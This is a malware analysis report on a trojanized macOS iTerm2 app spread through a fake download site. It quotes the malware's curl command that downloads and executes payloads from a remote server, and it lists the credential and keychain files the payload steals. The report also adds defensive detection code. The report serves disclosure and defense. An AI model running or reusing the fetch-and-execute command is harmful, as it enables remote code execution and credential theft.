Earlier this month, a user on the Chinese question-and-answer website Zhihu reported that a search engine result for the keyword "iTerm2" led to a fake website called iterm2.net that mimics the legitimate iterm2.com (Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link found on iterm2.net. When this app is executed, it downloads and runs g.py, a malicious Python script, from 47[.]75[.]123[.]111. This malware, which Trend Micro detects as TrojanSpy.Python.ZURU.A, collects private data from a victim's machine.
Figure 1. The fraudulent website iterm2.net
Objective-See previously published a blog entry about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib. This, in turn, downloads and runs other components, including the aforementioned g.py script and a Mach-O file called "GoogleUpdate" that contains a Cobalt Strike beacon payload. This blog entry covers the malware's details.
The trojanized app
As of September 15, iterm2.net is still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link, hxxp://www.kaidingle.com/iTerm/iTerm.dmg, from which users download a macOS disk image file (DMG) called iTerm.dmg. The user is redirected to this download URL for iTerm.dmg regardless of which app version the user selects on the fake website; the real iterm2.com website has different URLs and files for the various versions. The files downloaded from the legitimate website come in ZIP format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.
Figure 2. The file downloaded from the fake website (left) and the official website (right)
Comparing the folder structure of the DMG and ZIP files shows numerous differences between them:
- All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas files in the legitimate iTerm2.app are code signed with a Developer ID Application certificate. According to Apple documentation, an Apple Distribution certificate is only used to sign an app before the developer delivers it to the App Store, so apps downloaded from the App Store generally don't have an Apple Distribution certificate.
Figure 3. Trojanized iTerm2 app code signing
- The trojanized iTerm2 app contains a file called libcrypto.2.dylib (with a SHA-256 hash of 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.
Figure 4. The libcrypto.2.dylib file added in the trojanized iTerm2 app
- In the trojanized iTerm2 app, the main Mach-O file has an additional load command, LC_LOAD_DYLIB, that loads the libcrypto.2.dylib file, as shown in Figure 5.
Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib
According to Objective-See's blog post, the malicious code contained in the libcrypto.2.dylib file is executed automatically when the victim runs the trojanized iTerm2 app. This is a clever method for repacking legitimate apps that we have not seen before.
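As an added example (not code from the original post or from Objective-See), the following parser lists the dylibs a Mach-O binary links through LC_LOAD_DYLIB and flags any that are not on an allowlist, which is how the extra load command described above can be spotted from the file itself. The embedded sample is a constructed minimal Mach-O, and the install name @rpath/libcrypto.2.dylib is an assumption, not the path observed in the malware.

```python
import struct
import sys

MH_MAGIC_64, MH_MAGIC = 0xFEEDFACF, 0xFEEDFACE  # little-endian 64-bit / 32-bit Mach-O
LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_REEXPORT_DYLIB = 0x0C, 0x80000018, 0x8000001F
DYLIB_CMDS = {LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_REEXPORT_DYLIB}

def linked_dylibs(data):
    """Install names of every dylib this Mach-O slice links, in load-command order."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == MH_MAGIC_64:
        hdr_len = 32                     # mach_header_64 carries an extra 'reserved' field
    elif magic == MH_MAGIC:
        hdr_len = 28
    else:                                # fat/universal (0xCAFEBABE) or big-endian: extract a slice first
        raise ValueError("not a thin little-endian Mach-O")
    ncmds, = struct.unpack_from("<I", data, 16)      # magic, cputype, cpusubtype, filetype, ncmds, ...
    off, names = hdr_len, []
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmd in DYLIB_CMDS:
            name_off, = struct.unpack_from("<I", data, off + 8)  # dylib.name.offset, relative to the command
            raw = data[off + name_off:off + cmdsize]
            names.append(raw.split(b"\x00", 1)[0].decode())
        off += cmdsize
    return names

def unexpected_dylibs(data, allowlist):
    """Linked dylibs that the allowlist (e.g. the official build's own list) does not account for."""
    return [n for n in linked_dylibs(data) if n not in allowlist]

# Constructed sample: a bare mach_header_64 followed by two LC_LOAD_DYLIB commands.
def _dylib_cmd(name):
    body = name.encode() + b"\x00"
    body += b"\x00" * (-len(body) % 8)              # load commands are 8-byte aligned
    # cmd, cmdsize, name offset (24), timestamp, current_version, compatibility_version
    return struct.pack("<IIIIII", LC_LOAD_DYLIB, 24 + len(body), 24, 2, 0x10000, 0x10000) + body

_CMDS = _dylib_cmd("/usr/lib/libSystem.B.dylib") + _dylib_cmd("@rpath/libcrypto.2.dylib")
SAMPLE = struct.pack("<IIIIIIII", MH_MAGIC_64, 0x0100000C, 0, 2, 2, len(_CMDS), 0, 0) + _CMDS
EXPECTED_ITERM2 = {"/usr/lib/libSystem.B.dylib"}   # stand-in for the legitimate app's dylib list

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for name in unexpected_dylibs(blob, EXPECTED_ITERM2):
        print("unexpected dylib:", name)
```

Run it against the official build first to capture the expected list, then against the suspect binary; universal binaries must be thinned to one slice before parsing.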
Once executed, the malware connects to its server and receives these instructions from it:
- "curl -sfo /tmp/g.py http://47[.]75[.]123[.]111/g.py && chmod 777 /tmp/g.py && python /tmp/g.py && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate"
- Download the g.py script to /tmp/g.py and execute it
- Download "GoogleUpdate" to /tmp/GoogleUpdate and execute it
- Collect data using the g.py script
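As an added example that is not part of the original post, this Python detector looks for the shape of the instruction above in process-execution logs: a curl download into a path followed, in the same command line, by execution of the dropped file, either directly or through an interpreter. The sample events are constructed for the example, and their field names are assumptions rather than any particular EDR's schema.

```python
import re
import shlex

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "perl", "osascript"}

def _curl_output_path(tokens):
    """Path given to curl's -o/--output, including combined short flags such as -sfo."""
    for i, tok in enumerate(tokens[1:], 1):
        if tok in ("-o", "--output") or (tok[:1] == "-" and tok[:2] != "--" and "o" in tok[1:]):
            return tokens[i + 1] if i + 1 < len(tokens) else None
    return None

def staged_download_chain(cmdline):
    """Return the files a command line downloads with curl and then executes, in order."""
    dropped, executed = [], []
    for seg in re.split(r"\s*(?:&&|\|\||;|\|)\s*", cmdline):   # one simple command per segment
        try:
            tokens = shlex.split(seg)
        except ValueError:                         # unbalanced quotes: fall back to a whitespace split
            tokens = seg.split()
        if not tokens:
            continue
        prog = tokens[0].rsplit("/", 1)[-1]
        if prog == "curl":
            path = _curl_output_path(tokens)
            if path:
                dropped.append(path)
        elif tokens[0] in dropped:                 # dropped file run directly
            executed.append(tokens[0])
        elif prog in INTERPRETERS:                 # dropped file run through an interpreter
            executed.extend(a for a in tokens[1:] if a in dropped and a not in executed)
    return executed

def flag_events(events):
    """(pid, dropped-and-executed paths) for every process event whose command line matches."""
    chains = ((ev["pid"], staged_download_chain(ev["cmdline"])) for ev in events)
    return [(pid, chain) for pid, chain in chains if chain]

# Constructed sample events (fields are assumptions); the first mirrors the malware's instruction.
SAMPLE_EVENTS = [
    {"pid": 4242, "cmdline": "curl -sfo /tmp/g.py http://47[.]75[.]123[.]111/g.py && chmod 777 /tmp/g.py"
                             " && python /tmp/g.py && curl -sfo /tmp/GoogleUpdate"
                             " http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate"
                             " && /tmp/GoogleUpdate"},
    {"pid": 4243, "cmdline": "curl -sfo /tmp/pkg.tar.gz https://example.invalid/pkg.tar.gz"
                             " && tar xf /tmp/pkg.tar.gz -C /tmp"},
]
if __name__ == "__main__":
    for pid, chain in flag_events(SAMPLE_EVENTS):
        print(f"pid {pid}: downloaded and then executed {chain}")
```

The second event downloads a file but never executes it, so it is not flagged; pairing this with the parent process (a GUI app such as iTerm2 spawning the shell) would further sharpen the rule.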
The Python script g.py collects the following system data and files from the victim's machine, which the script then sends to the server:
- Operating system information
- Username
- Installed applications
- Local IP address
- Copies of these files and folders:
  - ~/.bash_history
  - ~/.zsh_history
  - ~/.gitConfig
  - /etc/hosts
  - ~/.ssh
  - ~/.zhHistory
  - ~/Library/Keychains/Login.keychain-db
  - ~/Library/Application Support/VanDyke/SecureCRT/Config/
  - ~/Library/Application Support/iTerm2/SavedState/
- The contents of these directories:
  - ~/ (the current user's home directory)
  - ~/Desktop
  - ~/Documents
  - ~/Downloads
  - /Applications
Further analysis of the trojanized iTerm2 app's Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.
Table 1. Other trojanized apps found on VirusTotal
File Name | SHA-256 Hash | Detection
iTerm.app.zip | 5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0 | TrojanSpy.MacOS.ZURU.A
SecureCRT.dmg | ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132 | Trojan.MacOS.ZuRu.PFH
SecureCRT.dmg | 1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921 | Trojan.MacOS.ZuRu.PFH
Microsoft Remote Desktop.dmg | 5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259 | TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg | 6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff | TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg | 91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e | TrojanSpy.MacOS.ZURU.A
Searching VirusTotal for the Secure Sockets Layer (SSL) certificate thumbprint that iterm2.net used revealed several other fraudulent websites. As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.
Figure 6. Other fake websites found on VirusTotal
We were able to access one of these fake websites, snailsvn.cn, but the download link on its page was empty at that time, so it remains uncertain whether this website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for Mac OS X, in the wild (Figure 7). All of these domains were inaccessible at the time of writing.
Figure 7. The fake SnailSVN website
Download server
The server used for hosting the trojanized packages, kaidingle[.]com, was registered on September 7 and is currently still active. According to VirusTotal, apart from iterm.dmg, it also hosts other DMG files such as SecureCTR.dmg and Navicat15_cn.dmg (Figure 8). As of September 18, the latter two DMG files can still be downloaded from the server.
Figure 8. URLs related to the download server
According to the server's WHOIS record (WHOIS being the query and response protocol for domain registration data), four other domains are registered to the same registrant (Figure 9). However, so far, none of these domains show any indication that they are related to malware.
Figure 9. Other domains from the same registrant
Second-stage server
VirusTotal recorded multiple URLs related to a second-stage server at the IP address 47[.]75[.]123[.]111, the same address that hosts the malicious g.py script, between September 8 and 17, as shown in Figure 10.
Figure 10. URLs under the second-stage server
Besides the g.py script and "GoogleUpdate" components that are part of the trojanized iTerm2 app's malware routine, the second-stage server also hosts four other Mach-O files that are used as post-exploitation tools (Table 2).
Table 2. Other Mach-O files hosted on the second-stage server
File Name | SHA-256 Hash | Description/Detection
la | 79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5 | An open source intranet penetration scanner framework (https://github.com/k8gege/LadonGo)
iox | f005ea1db6da3f56e4c8b1135218b1da56363b077d3be7d218d8284444d7824f | A tool for port forwarding and intranet proxying (https://github.com/EddieIvan01/iox)
netscan-darwin-amd64 | d12ef7f6de48c09e84143e90fe4a4e7b1b3d10cee5cd721f7fdf61e62e08e749 | Netscan scans a network for ports that are open on an IP/IP range and for IP addresses that are in use on that network (https://github.com/jessfraz/netscan/releases)
Host | a83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e | Backdoor.MacOS.Wirenet.PFH
Notably, the IP address of the second-stage server is similar to the one "GoogleUpdate" connects to, 47[.]75[.]96[.]198. Both IP addresses are hosted by Alibaba Hong Kong. As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were registered around the same time as those on the second-stage server, which suggests that the two servers may have been set up by the same threat actor.
Figure 11. URLs under the same server as "GoogleUpdate"
Advertisement sites
As detailed in the aforementioned user report, the first item in the search engine results is under the subdomain rjxz.jxhwst.top. Searching Google for this address returns two results that lead only to Google's cached copies of the pages (Figure 12); as of this writing, the actual pages are already down.
Figure 12. Google caches of the two fake sites
The first search result, titled "Microsoft Remote Desktop," has the address hxxp://rjxz.jxhwst.top/3, but based on its cache (Figure 13) and source code (Figure 14), we found that it redirected visitors to a fake website, hxxp://remotedesktop.vip.
Figure 13. The cache of the fake "Microsoft Remote Desktop" page
Figure 14. The source code of the fake page
Upon checking its main page, we discovered that the second-level domain jxhwst.top belongs to an agriculture company in northern China. Apart from the subdomain rjxz.jxhwst.top, this second-level domain has 44 other subdomains, almost all of which are used for advertisements that have no relation to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising purposes but cannot prevent them from being used for illegal purposes. If this is the case, the threat actor rented the subdomain for malware distribution.
Figure 15. The subdomains of the agriculture company
Security recommendations
To protect systems from threats like these, end users should only download apps from official and legitimate marketplaces. They should be careful about search engine results and always double-check URLs to make sure they really point to the official sites. Mac users can consider multilayered security solutions such as Trend Micro Antivirus for Mac®, which provides enhanced anti-scam protection that flags and blocks scam websites that attempt to steal their personal data. Antivirus for Mac is also available as part of Trend Micro Maximum Security, a multi-platform solution that offers comprehensive security and multidevice protection against cyberthreats.
Indicators of Compromise (IOCs)
MITRE Tactics, Techniques, and Procedures (TTPs)
Tactic | ID | Name | Description
Initial Access | T1566.002 | Spearphishing Link | Phishing website reached from search engine results
Execution | T1059.006 | Python | Downloads and runs a Python script
Execution | T1204.002 | Malicious File | Executing the repackaged iTerm2 app launches the malicious dylib libcrypto.2.dylib
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Strings in the malicious dylib are AES and Base64 encoded
Defense Evasion | T1036 | Masquerading | The malware is a malicious dylib inserted into a repackaged iTerm2 app
Collection | T1560.002 | Archive via Library | Collects various information and adds it to a zip archive
Collection | T1005 | Data from Local System | Collects system information, bash history and login keychain information
Collection | T1602 | Data from Configuration Repository | Collects the contents of /Library/Application Support/VanDyke/SecureCRT/Config
Exfiltration | T1041 | Exfiltration Over C2 Channel | Files are exfiltrated to hxxp://47[.]75[.]123[.]111/u.php
Disclaimer
Trend Micro Inc. published this content on 30 September 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 30 September 2021 13:21:10 UTC.